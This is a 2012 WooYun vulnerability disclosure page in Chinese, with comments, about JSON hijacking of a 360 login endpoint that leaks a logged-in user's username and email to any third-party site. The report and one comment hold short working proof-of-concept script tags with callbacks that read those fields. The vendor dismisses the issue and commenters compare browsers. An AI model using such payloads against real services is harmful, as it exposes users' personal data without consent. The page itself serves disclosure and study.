当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011284

漏洞标题:360某json hijacking(只要你登陆访问,我就知道你的用户名,邮箱)

相关厂商:奇虎360

漏洞作者: kobin97

提交时间:2012-08-24 15:13

修复时间:2012-08-24 15:32

公开时间:2012-08-24 15:32

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:2

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-08-24: 细节已通知厂商并且等待厂商处理中
2012-08-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

360某json hijacking(只要你登陆访问,我就知道你的用户名,邮箱)

详细说明:

<script>
function wooyun(v)
{
alert(v.username);
}
</script>
<script src="http://js.login.360.cn/?o=sso&m=info&func=wooyun"></script>

漏洞证明:


修复方案:

应该懂吧。。

版权声明:转载请注明来源 kobin97@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-08-24 15:32

厂商回复:

感谢您的反馈,这是一个开放接口,任何程序都可以获取的到...您同样可以获取新浪微博、WebQQ等的同类型接口,所以不属于漏洞

最新状态:

暂无

漏洞评价:

评论

  1. 2012-08-24 15:28 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    带头大哥你知道的太多了

  2. 2012-08-24 15:35 | Bincker ( 普通白帽子 | Rank:193 漏洞数:23 )

    非同源无法达到目的,鉴定完毕!~

  3. 2012-08-24 15:41 | kobin97 认证白帽子 ( 核心白帽子 | Rank:1754 漏洞数:190 | 关注网络安全。。)

    厂商不知道什么叫 json hijacking? 我在别的站可以获取360的用户名,邮箱,这不属于漏洞?QQ那些都有检查来源是否同域吧。。。

  4. 2012-08-24 15:55 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    哈哈 360貌似不懂hijacking

  5. 2012-08-24 16:00 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    百度搜json hijacking 普及下

  6. 2012-08-24 16:02 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    @xsser 360不懂hijacking。。。。确实存在的问题。。。。

  7. 2012-08-24 16:02 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @Jannock 你做个页面测试下呗

  8. 2012-08-24 16:06 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    又做个广告了。。。。。在360登陆了后,访问 http://www.cnblogs.com/jannock/ 就知道了。。。没登陆的不会弹哦。

  9. 2012-08-24 16:10 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    @Jannock 我登陆了 没有弹<script>function wooyun(v){ if(v.qid){ var a="aler"+"t"; eval(a+"('"+ v.username+ "|"+ v.login_email +",您好!');");}}</script><script src="http://js.login.360.cn/?o=sso&m=info&func=wooyun"></script>

  10. 2012-08-24 16:12 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    @king 不可能吧。。。你再研究下。。。

  11. 2012-08-24 16:21 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    @king 貌似人家修复了 有域限制吧 跨站是读取不了的

  12. 2012-08-24 16:23 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"Set-Cookie: loginedUserName=xxx; expires=Sat, 25-Aug-2012 08:19:44 GMT; path=/; domain=360.cn

  13. 2012-08-24 16:29 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    @king 没修复,没限制。。

  14. 2012-08-24 16:32 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    @Jannock 这样子的呀!!那就不清楚了,,我抓包你网站的数据 显示 wooyun({"qid":"","username":"","login_email":"","userName":"","crumb":"","img_url":""})在360网站上显示是有数据的!!!

  15. 2012-08-24 16:37 | f1eecy ( 路人 | Rank:21 漏洞数:4 | 图书管理员~)

    @Jannock 我弹了,不是我wooyun的用户名邮箱,是我另一个工作邮箱,咋回事~

  16. 2012-08-24 16:38 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    @f1eecy 是你在360注册的邮箱呀。。。。

  17. 2012-08-24 16:39 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @f1eecy @Jannock ...

  18. 2012-08-24 16:40 | f1eecy ( 路人 | Rank:21 漏洞数:4 | 图书管理员~)

    @Jannock 哈,我竟然在360注册过,我竟然不记得了~

  19. 2012-08-24 16:41 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    @xsser @f1eecy 你什么环境呀!!!求解呀,我这不弹,,用抓包数据抓取目前没有时间嘛

  20. 2012-08-24 16:44 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    @Jannock 搞清楚了,,ie和360浏览器下无效,,火狐有效!!!

  21. 2012-08-24 16:46 | f1eecy ( 路人 | Rank:21 漏洞数:4 | 图书管理员~)

    @king win7 chrome,你确认你登陆360了?话说360竟然保存了我的登陆信息这么久。。。

  22. 2012-08-24 16:49 | f1eecy ( 路人 | Rank:21 漏洞数:4 | 图书管理员~)

    @king IE9测试,弹,弹,弹,弹走鱼尾纹

  23. 2012-08-24 16:58 | 小一 ( 实习白帽子 | Rank:32 漏洞数:13 )

    @Jannock 又被一哥弹了,Chrome 21

  24. 2012-08-24 17:21 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @xsser 方总,叫魔术黑阔-Rayh4c和lake2帮他们上上"腾讯单击点击劫持漏洞的影响"

  25. 2012-08-24 18:06 | 波波虎 ( 普通白帽子 | Rank:266 漏洞数:51 | 11111111111)

    360为了你的安全,全面监控你的操作^_^